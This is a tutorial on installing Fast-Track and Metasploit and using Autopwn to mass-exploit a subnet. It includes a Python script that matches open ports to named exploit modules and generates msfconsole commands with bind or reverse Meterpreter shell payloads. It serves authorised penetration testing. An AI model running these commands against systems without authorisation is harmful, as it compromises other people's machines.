Automated penetration testing tools are a double-edged sword: they make it easy to check your network for well-known vulnerabilities, but attackers can point the same tools at your network to find and compromise any vulnerable machine on it.
Because they are quick and easy to use, they are within reach of unskilled attackers and script kiddies – which makes it all the more important that you run these tools against your own network first, so you can fix what they find before someone else exploits it.
A good tool to start with is Fast-Track, a relatively new open-source project written in Python. Parts of Fast-Track drive the Metasploit Framework, so we need to install Metasploit as well as Fast-Track. This How To uses a system running Ubuntu 9.10; you may need to make adjustments if you are using a different Linux distro.
Downloading and Installing Metasploit and Supporting Packages
Before downloading Metasploit, install the supporting packages:
# apt-get install ruby libruby rdoc
# apt-get install libyaml-ruby
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
# apt-get install libdl-ruby
# apt-get install libiconv-ruby
# apt-get install rubygems
Then change to your home directory and download Metasploit itself. The easiest way to do this is with Subversion: make sure it is installed on your system (if not, sudo apt-get install subversion), then run the checkout below. Note that the Metasploit project has since moved from this Subversion repository to Git (https://github.com/rapid7/metasploit-framework), so treat the URL as historical:
svn co https://metasploit.com/svn/framework3/trunk/
Downloading and Installing Fast-Track
To download Fast-Track, change to your home directory again and type the checkout below (Fast-Track has since been folded into the Social-Engineer Toolkit, so this repository is no longer where current versions live):
svn co http://svn.thepentest.com/fasttrack/
Next, move to the newly downloaded fasttrack directory and install Fast-Track:
python setup.py install
You'll be asked for the path to the Metasploit checkout you downloaded earlier, and with any luck Fast-Track will install together with all its dependencies. If it doesn't, the documentation lists the Python modules you may need to install by hand: pexpect, FreeTDS, pymssql, ClientForm, Beautiful Soup, PyMills and Psyco – all of them Python 2 era packages that you can install via Ubuntu's Synaptic package manager. You'll also need Nmap and SQLite3 on the system.
Once Fast-Track is installed, run Fast-Track in menu mode:
python fast-track.py -i
Fast-Track will check all the required packages are installed, and if so, you'll see the Fast-Track main menu (below).
The first thing to do is update the whole installation by selecting option 1 (Fast-Track Updates) followed by option 10 on the update menu (Update Everything). This can take a little time - about enough to go and get a cup of coffee. Once the process has completed we are ready to get testing.
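Fast-Track's own startup check simply refuses to run if something is missing; before reaching that point it is handy to know exactly which of the modules and tools named above are absent. The following preflight script is an added example (not part of Fast-Track or its setup.py). It assumes the package names above map to the import names pexpect, pymssql, ClientForm, BeautifulSoup, pymills and psyco, and that a framework3 trunk checkout contains the msfconsole and msfcli launchers; run it with the same python you will use for fast-track.py, since it reports what that interpreter can import.

```python
"""Preflight check for a Fast-Track install: report missing Python modules,
missing command-line tools and a Metasploit checkout that lacks its launchers.
Added example; not Fast-Track's own code."""
import importlib.util
import os
import shutil
import sys

# Import names assumed for the packages the Fast-Track docs list.
REQUIRED_MODULES = ["pexpect", "pymssql", "ClientForm",
                    "BeautifulSoup", "pymills", "psyco"]
# Tools the install and the Autopwn test call out to.
REQUIRED_BINARIES = ["nmap", "sqlite3", "svn", "ruby"]
# Launchers assumed to exist at the top of a framework3 trunk checkout.
METASPLOIT_FILES = ["msfconsole", "msfcli"]


def missing_modules(names):
    """Return the module names that the running interpreter cannot import."""
    return [name for name in names if importlib.util.find_spec(name) is None]


def missing_binaries(names):
    """Return the tool names that are not found on PATH."""
    return [name for name in names if shutil.which(name) is None]


def missing_metasploit_files(msf_dir, files=METASPLOIT_FILES):
    """Return the launcher files that are absent from the Metasploit directory."""
    return [f for f in files if not os.path.isfile(os.path.join(msf_dir, f))]


def preflight(msf_dir):
    """Collect every missing item, keyed by category."""
    return {
        "python modules": missing_modules(REQUIRED_MODULES),
        "command-line tools": missing_binaries(REQUIRED_BINARIES),
        "metasploit files": missing_metasploit_files(msf_dir),
    }


def ok(report):
    """True when no category has anything missing."""
    return all(not missing for missing in report.values())


if __name__ == "__main__":
    # Usage: python preflight.py /path/to/metasploit/trunk
    msf_dir = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~/trunk")
    report = preflight(msf_dir)
    for category, missing in report.items():
        status = "ok" if not missing else "missing: " + ", ".join(missing)
        print("%-20s %s" % (category, status))
    sys.exit(0 if ok(report) else 1)
```

A non-zero exit status means something is still missing, so the script can also gate a provisioning script that installs the tools before the first fast-track.py run.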
Using Metasploit's Autopwn with Fast-Track
The test we are going to run in this article is Metasploit's built-in Autopwn function (db_autopwn in msfconsole). It scans the target range with Nmap, records the open ports in Metasploit's database, and then launches every exploit module whose target port matches an open port, with the payload of your choice. Doing this by hand in Metasploit is fairly straightforward, but Fast-Track automates the whole sequence, driving Metasploit and doing all the work for us. Be aware that db_autopwn has since been removed from the Metasploit Framework, so this particular automation only works with the framework3 trunk of the period.
To get started, choose option 2 (Autopwn Automation) from the main Fast-Track menu, and enter the IP range you would like to scan for vulnerabilities using Nmap's range syntax. For example, type 192.168.1.1-254 to scan the whole 192.168.1 subnet.
Then choose option 1 for a bind shell. With a bind shell the payload listens on a port on the compromised machine and Metasploit connects to it; the reverse shell option instead makes the target connect back to your machine, which is the better choice when a firewall between you and the target blocks inbound connections.
A word of caution: the autopwn process fires real exploits, which can crash applications or whole systems on the machines being scanned, so choose carefully when to carry out this test, and only run it against machines you own or are authorised to test.
After the autopwn process completes, which can take anything from 5 minutes to an hour or so, you'll see either the message "No sessions", meaning none of the machines in the range could be compromised, or "Active sessions" followed by a list of the machines that were.
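What Autopwn does between the Nmap scan and the "Active sessions" list is a port-to-exploit match, and seeing that logic spelled out makes the results easier to interpret. The following is an added example (not Fast-Track or Metasploit code) that reimplements the matching stage over constructed Nmap grepable (-oG) output: it collects each host's open TCP ports, picks the modules whose target port matches, and emits the msfconsole commands that would launch each one with the bind or reverse Meterpreter payload chosen in the menu above. The module-to-port table is a hand-picked subset for illustration, not the framework's own index, and the sample scan output, the 192.168.1.9 attacker address and the RHOST/LHOST/PAYLOAD option names are assumptions of the example.

```python
"""Port-matching stage of Autopwn, re-implemented for illustration.
Added example; not Fast-Track's or Metasploit's own code."""

# Constructed Nmap grepable (-oG) output for a small lab range.
SAMPLE_NMAP_GREPABLE = """\
# Nmap 5.00 scan initiated as: nmap -sS -oG - 192.168.1.1-254
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (998)
Host: 192.168.1.16 ()\tStatus: Up
Host: 192.168.1.16 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (996)
# Nmap done: 254 IP addresses (2 hosts up) scanned
"""

# Illustrative module -> default target port table (a constructed subset).
MODULE_PORTS = {
    "exploit/windows/smb/ms08_067_netapi": 445,
    "exploit/windows/smb/ms06_040_netapi": 445,
    "exploit/windows/dcerpc/ms03_026_dcom": 135,
    "exploit/windows/iis/iis_webdav_upload_asp": 80,
}


def parse_grepable(text):
    """Map each host to its open TCP ports as (port, service) tuples.

    Grepable port entries look like port/state/proto/owner/service/rpc/version/;
    filtered and closed ports are dropped, as Autopwn only targets open ones.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: ") or "\tPorts: " not in line:
            continue
        ip = line.split()[1]
        ports_field = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        open_ports = []
        for entry in ports_field.split(", "):
            fields = entry.split("/")
            if len(fields) < 5:
                continue
            port, state, proto, service = fields[0], fields[1], fields[2], fields[4]
            if state == "open" and proto == "tcp":
                open_ports.append((int(port), service))
        hosts.setdefault(ip, []).extend(open_ports)
    return hosts


def select_exploits(hosts, module_ports=MODULE_PORTS):
    """Pick, per host, every module whose target port the host has open."""
    plan = {}
    for ip, ports in hosts.items():
        open_set = {port for port, _service in ports}
        matches = [mod for mod, port in module_ports.items() if port in open_set]
        if matches:
            plan[ip] = matches
    return plan


def msf_commands(plan, shell="bind", lhost="192.168.1.9"):
    """Emit the msfconsole commands Autopwn would run for the plan.

    A bind payload listens on the target; a reverse payload needs LHOST so
    the target knows where to connect back.
    """
    if shell == "bind":
        payload = "windows/meterpreter/bind_tcp"
    elif shell == "reverse":
        payload = "windows/meterpreter/reverse_tcp"
    else:
        raise ValueError("shell must be 'bind' or 'reverse'")
    commands = []
    for ip, modules in plan.items():
        for mod in modules:
            commands.append("use %s" % mod)
            commands.append("set RHOST %s" % ip)
            commands.append("set PAYLOAD %s" % payload)
            if shell == "reverse":
                commands.append("set LHOST %s" % lhost)
            commands.append("exploit -j")  # run as a background job
    return commands


if __name__ == "__main__":
    hosts = parse_grepable(SAMPLE_NMAP_GREPABLE)
    plan = select_exploits(hosts)
    for ip, modules in plan.items():
        print(ip, "->", ", ".join(modules))
    print("\n".join(msf_commands(plan, "bind")))
```

The filtered 3389 port on 192.168.1.16 is deliberately ignored, and 192.168.1.1 only attracts the port 80 module: Autopwn matches on ports, not on whether the service is actually vulnerable, which is why a long "exploit" run can still end with "No sessions".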
In the screenshot below, the machine at 192.168.1.9 running Fast-Track has pwned (compromised) the machine at 192.168.1.16 through four different vulnerabilities, each delivering the Meterpreter payload, which we will look at in a moment.
Typing sessions -v lists the open sessions together with the exploit that opened each one.
Typing sessions -i 1 attaches you to session 1, the shell opened by the first successful exploit (replace the 1 with 2, 3 or 4 for the sessions opened by the other three), and drops you into a meterpreter prompt.